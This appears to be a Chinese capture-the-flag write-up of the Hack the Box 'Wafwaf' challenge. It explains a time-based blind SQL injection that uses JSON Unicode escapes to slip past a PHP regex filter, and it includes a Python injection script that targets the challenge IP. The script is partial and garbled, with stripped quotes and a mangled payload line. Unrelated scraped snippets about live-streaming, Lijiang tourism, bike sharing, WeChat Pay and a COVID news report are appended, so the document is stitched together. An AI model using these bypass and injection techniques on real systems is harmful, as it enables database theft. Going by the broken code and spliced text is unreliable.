又开始了一天的学习之路,首先打开了我的Hack the Box
Wafwaf
提示:My clas *** ate Jason made this *** all and super secure note taking application, check it out!(我的同学Jason *** 了这个小型且超级安全的笔记记录应用程序,请查看!)
访问界面,简单明了,直接给了源码
http://159.65.87.50:31703/
显然就是代码审计了
简单看下代码,流程就是:php://input获取数据=> waf函数验证非法字符=>? 解码json数据=> 执行sql语句
error_reporting(0)? 关闭错误报告。
preg_match_all? ? ? 函数用于执行一个全局正则表达式匹配。
preg_quote()? ? ? ? ? 需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。
正则表达式特殊字符有: . \ + * ? [ ^ ] $ ( ) { }=! < > | : -
json_decode? ? ? ? ? 对 *** ON 格式的字符串进行解码。
file_get_contents() 把整个文件读入一个字符串中。
没过滤全sql关键字,还可以注入
preg_match_all函数可能有问题,可能可以通过某种输入绕过正则
php://input可能有漏洞
json_decode函数可能有漏洞
首先,检查 waf() *** 时,我们收到输入并验证筛选。如果不在筛选json_decode,则可以看到使用 *** 返回值。
query() *** 获取 $obj->user 的值并发送 SQL 请求,但查看返回值时,不会返回特定值,也不会输出错误。所以首先好像是Time Based Blind SQLI问题
然后,我们检查 waf 的参数值,获取并交出php://input的值。
php://input获取原始数据,该数据将作为 Post 请求的主体部分。
将值发送到原始数据,以便获取并输出该值。因此,让我们将 SQLI 有效负载作为原始数据
在json_decode中,它转换为字符串并返回。Unicode Escape?可以在此处完成。
理论上应该可以用sqlmap自定义tamper去跑的,但是自己尝试半天没有成功,最后自己写了盲注脚本,花了我一下午的时间,最后跑这个脚本还等了我一晚上的时间
#!/usr/bin/python3 # -*- coding:utf-8 -*- """ @author: maple @file: wafwaf.py @time: 2021/1/23 17:10 @desc: """ from requests import post from time import time from json import dumps url="http://159.65.87.50:31703" headers={'content-type': 'application/json'} payload= -".format(second_time - first_time)) elif mode=='2': for i in range(100): first_time=time() if i < 10: unicode_="\0 + str(i) elif i >=10 and i < 20: unicode_="\1\0 + str(i)[1] elif i >=20 and i < 30: unicode_="\2\0 + str(i)[1] elif i >=30 and i < 40: unicode_="\3\0 + str(i)[1] elif i >=40 and i < 50: unicode_="\4\0 + str(i)[1] elif i >=50 and i < 60: unicode_="\5\0 + str(i)[1] elif i >=60 and i < 70: unicode_="\6\0 + str(i)[1] elif i >=70 and i < 80: unicode_="\7\0 + str(i)[1] elif i >=80 and i < 90: unicode_="\8\0 + str(i)[1] elif i >=90 and i < 100: unicode_="\9\0 + str(i)[1] else: unicode_="\1\0\0" post(url, data=json_update(query.format(unicode_), '0'), headers=headers) second_time=time() if second_time - first_time >=4.9: print("[*] Sleep : {}".format(second_time - first_time)) print("[*] {} : {} -".format(string, i)) break elif mode=='3': result='' for j in range(1, Len + 1): unicode__="\0 + str(j) for i in range(33, 128): if i >=33 and i < 40: unicode_="\3\0 + str(i)[1] elif i >=40 and i < 50: unicode_="\4\0 + str(i)[1] elif i >=50 and i < 60: unicode_="\5\0 + str(i)[1] elif i >=60 and i < 70: unicode_="\6\0 + str(i)[1] elif i >=70 and i < 80: unicode_="\7\0 + str(i)[1] elif i >=80 and i < 90: unicode_="\8\0 + str(i)[1] elif i >=90 and i < 100: unicode_="\9\0 + str(i)[1] elif i >=100 and i < 110: unicode_="\1\0\0 + str(i)[2] elif i >=110 and i < 120: unicode_="\1\1\0 + str(i)[2] elif i >=120 and i < 130: unicode_="\1\2\0 + str(i)[2] else: unicode_="\1\3\0 + str(i)[2] first_time=time() post(url, data=json_update(query.format(unicode__, unicode_), '0'), headers=headers) second_time=time() if second_time - first_time >=4.9: result +=chr(i) break print("[*] {} : {}".format(string, result)) print("-")
代码此处贴一半,有需要的人自己尝试完善,也可以私聊我给你。
这套代码如果以后遇到基于时间的盲注还可以复用
最后脚本跑出来的结果
因为一开始对这题没有任何思路,尝试了多种sqlmap知识,然后一直在google和百度,但是都没有找到解决办法,但是也乘机见识了很多新的姿势,比如各种绕过,也学会了编写时间注入的tamper脚本
假如你的店面沒有直播间权,你又想开直播,那么你一定为直播间权头痛,外边有很多第三方的服务提供商,能掏钱让她们帮你启用直播间管理权限,实际上她们并沒有说白了的侧门,仅仅他比你更清晰标准而已,而这种标...
在有些人看来,丽江大概早已不是一个可以“寄放灵魂”的地方了,古城里被商业化感极强的酒吧占据,街上挤满了因为“艳遇”二字被吸引来的旅行者,整座城仿佛都被浮躁掩盖,失去了最初的安静与纯粹。 但其...
现在共享单车非常火热,各路资本都纷纷进驻,可是共享单车的盈利模式究竟是什么?这不应该是政府工作的一部分吗?如果政府做了这部分那就没共享单车的事儿了。目前感觉主要是北上广这类大型城市政府无法(也可能是不...
微信支付查找“商户单号”方法: 1.打开微信app,点击消息列表中和“微信支付”的对话 2.找到扫码支付给360doc个人图书馆的账单,点击“查看账单详情” 3.在“账单详情”页,找到...
居民正在凯乐居活动室里学习吹奏葫芦丝。 凯西社区的日间照料中心,去年被省里评上了五星级。 高级在哪里?上周我特地去了趟。 首先是硬件很好。影视厅里在放越剧,沙发是软座的,坐得很舒服,比外面电...
新华社南京12月18日电(记者何磊静、朱国亮)记者18日从无锡市新冠肺炎疫情防控应急指挥部办公室获悉,梁溪区聚盛食品商行一批库存缅甸进口“冻带鱼”(生产批号20202),在16日的常规检测中发现外...